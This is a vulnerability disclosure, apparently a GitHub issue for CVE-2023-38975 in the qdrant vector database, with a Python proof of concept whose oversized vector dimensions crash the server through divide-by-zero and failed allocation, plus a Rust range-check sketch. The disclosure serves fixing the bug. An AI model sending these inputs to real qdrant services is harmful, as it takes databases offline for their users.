Headline
CVE-2023-38975: Wrong dim when create collection may cause db service down · Issue #2268 · qdrant/qdrant
- Buffer Overflow vulnerability in qdrant v.1.3.2 allows a remote attacker to cause a denial of service via the chunked_vectors.rs component.
Wrong dim when create collection may cause db service down
Current Behavior
Denial of Service; users cannot use the vector database normally.
Steps to Reproduce
Some bugs related to the dim of the vector when creating a collection, which can cause DoS.
Details
version: 1.3.2
At https://github.com/qdrant/qdrant/blob/master/lib/segment/src/vector_storage/chunked_vectors.rs#L28, it checks that it cannot be 0, but vector_size may be zero if dim is too big, such as 2**63. Then it will divide by zero.
If dim is too big, the vector::new will fail on my 128G memory server, and the service will go down.
PoC
from qdrant_client import QdrantClient
from qdrant_client import models

c = QdrantClient(host="127.0.0.1", port=6333)
c.recreate_collection(
    collection_name="test",
    vectors_config=models.VectorParams(size=2**63, distance=models.Distance.COSINE),
)
# [2023-05-30T08:25:32.996Z ERROR qdrant::startup] Panic occurred in file lib/segment/src/vector_storage/chunked_vectors.rs at line 28: attempt to divide by zero

c = QdrantClient(host="127.0.0.1", port=6333)
c.recreate_collection(
    collection_name="test",
    vectors_config={
        "payload": models.VectorParams(size=2**59, distance=models.Distance.DOT),
    },
)
#memory allocation of 2305843009213693952memory allocation of bytes failed
#2305843009213693952 bytes failed
#Aborted (core dumped)
Possible Solution
Check the value range.
P.S. This bug can also affect the cloud service.
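
The range check suggested under "Possible Solution", sketched in Rust as an added example (not code from the issue or from qdrant). The chunk size, the MAX_DIM limit, the u64 dimension type and all function names are assumptions for illustration; the wrapping helper shows why 2**63 four-byte elements yield a byte size of zero and why 2**59 asks for the 2305843009213693952 bytes seen in the abort message.

```rust
use std::mem::size_of;

// Assumed values for illustration; not taken from the qdrant source.
const CHUNK_SIZE_BYTES: u64 = 32 * 1024 * 1024;
const MAX_DIM: u64 = 65_536;

#[derive(Debug, PartialEq)]
pub enum DimError {
    Zero,
    TooLarge { dim: u64, max: u64 },
}

/// Byte size of one f32 vector the way unchecked release-mode arithmetic
/// computes it: the multiplication wraps modulo 2^64 instead of failing.
pub fn vector_bytes_wrapping(dim: u64) -> u64 {
    dim.wrapping_mul(size_of::<f32>() as u64)
}

/// Validate the requested dimension before any division or allocation,
/// then return how many vectors fit into one chunk.
pub fn checked_chunk_capacity(dim: u64) -> Result<u64, DimError> {
    if dim == 0 {
        return Err(DimError::Zero);
    }
    if dim > MAX_DIM {
        return Err(DimError::TooLarge { dim, max: MAX_DIM });
    }
    // Cannot overflow after the bound above; checked_mul is kept so the
    // divisor stays non-zero even if MAX_DIM is raised later.
    let vector_bytes = dim
        .checked_mul(size_of::<f32>() as u64)
        .ok_or(DimError::TooLarge { dim, max: MAX_DIM })?;
    Ok(CHUNK_SIZE_BYTES / vector_bytes)
}

fn main() {
    // Constructed inputs: a normal dimension plus the two sizes from the PoC.
    for dim in [0u64, 128, 1 << 59, 1 << 63] {
        println!(
            "dim={} wrapped_bytes={} checked={:?}",
            dim,
            vector_bytes_wrapping(dim),
            checked_chunk_capacity(dim)
        );
    }
}
```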